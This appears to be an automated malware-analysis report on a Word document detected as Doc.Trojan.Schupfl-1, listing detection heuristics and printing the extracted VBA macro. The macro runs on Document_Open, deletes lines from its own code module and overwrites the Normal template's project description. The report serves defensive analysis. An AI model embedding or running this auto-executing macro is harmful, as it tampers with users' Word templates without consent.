MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Schupfl-1. It contains a VBA macro within the Document_Open subroutine. This macro attempts to delete lines from the current document's VBA project and modifies the description of the NormalTemplate, potentially corrupting the global template's macro container and preventing further macro execution. The extracted DOC BODY contains references to 'Schlupfloch', which may indicate a specific tool or variant.
Heuristics 3
-
ClamAV: Doc.Trojan.Schupfl-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Schupfl-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 498 bytes |
SHA-256: c0c258cdcb8c6d951eaa73ba52f4137f9acb4028a81244aab2c2b56c0708ffe3 |
|||
|
Detection
ClamAV:
Doc.Trojan.Schupfl-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() ThisDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, 4 NormalTemplate.VBProject.Description = Chr(13) End Sub 'I Would Like To Speak My Mind... 'But I'm Not Going To Waste My Time! 'Lys Is Bliss... |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.